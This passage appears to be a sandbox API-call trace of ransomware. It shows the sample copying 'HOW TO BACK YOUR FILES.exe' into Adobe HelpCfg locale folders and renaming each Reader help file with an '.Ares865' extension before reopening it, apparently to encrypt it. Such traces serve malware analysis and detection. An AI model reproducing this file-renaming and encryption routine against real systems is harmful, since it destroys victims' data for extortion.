lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.318] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.318] lstrlenW (lpString="Ares865") returned 7 [0152.318] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.318] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.318] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ja_jp\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ja_jp\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.320] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ja_jp\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.320] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.320] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.320] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4cb0 [0152.320] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.324] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT" [0152.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4c38 | out: hHeap=0x2b0000) returned 1 [0152.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0152.324] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT") returned 55 [0152.324] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT" [0152.324] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.324] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\it_it\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.325] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.325] GetLastError () returned 0x0 [0152.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.325] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.325] CloseHandle (hObject=0x120) returned 1 [0152.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.325] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.325] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539f4820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539f4820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.326] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.326] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.326] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.326] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.326] lstrlenW (lpString="Ares865") returned 7 [0152.326] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.326] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.326] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\it_it\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\it_it\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.328] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\it_it\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.328] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4c38 [0152.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.333] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU" [0152.333] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4bc0 | out: hHeap=0x2b0000) returned 1 [0152.333] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0152.333] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU") returned 55 [0152.333] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU" [0152.333] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.333] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hu_hu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.334] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.334] GetLastError () returned 0x0 [0152.334] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.334] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.334] CloseHandle (hObject=0x120) returned 1 [0152.335] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.335] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.335] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539f4820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539f4820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.335] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.335] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.335] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.335] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.335] lstrlenW (lpString="Ares865") returned 7 [0152.335] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.335] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.335] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hu_hu\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hu_hu\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.337] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hu_hu\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.337] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.337] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.337] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4bc0 [0152.337] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.341] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR" [0152.341] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4b48 | out: hHeap=0x2b0000) returned 1 [0152.341] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0152.341] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR") returned 55 [0152.341] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR" [0152.341] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.341] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hr_hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.342] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.342] GetLastError () returned 0x0 [0152.342] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.342] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.343] CloseHandle (hObject=0x120) returned 1 [0152.343] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.343] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.343] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539f4820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539f4820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.343] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.343] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.343] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.343] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.343] lstrlenW (lpString="Ares865") returned 7 [0152.343] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.343] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.344] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hr_hr\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hr_hr\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.346] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hr_hr\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.346] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.346] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.346] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4b48 [0152.346] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.351] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR" [0152.351] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4ad0 | out: hHeap=0x2b0000) returned 1 [0152.351] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0152.351] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR") returned 55 [0152.351] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR" [0152.351] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.351] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fr_fr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.352] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.352] GetLastError () returned 0x0 [0152.352] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.352] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.352] CloseHandle (hObject=0x120) returned 1 [0152.353] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.353] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.353] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a1a980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a1a980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.353] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.353] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.353] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.353] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.353] lstrlenW (lpString="Ares865") returned 7 [0152.353] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.353] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.353] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fr_fr\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fr_fr\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.356] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fr_fr\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.356] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.356] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.357] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4ad0 [0152.357] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.361] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI" [0152.361] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4a58 | out: hHeap=0x2b0000) returned 1 [0152.361] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0152.361] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI") returned 55 [0152.361] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI" [0152.361] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.361] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fi_fi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.362] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.362] GetLastError () returned 0x0 [0152.362] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.362] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.362] CloseHandle (hObject=0x120) returned 1 [0152.362] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.362] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.362] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a1a980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a1a980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.363] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.363] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.363] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.363] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.363] lstrlenW (lpString="Ares865") returned 7 [0152.363] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.363] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.363] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fi_fi\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fi_fi\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.365] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Reader_10.0.helpcfg.Ares865" (normalized: 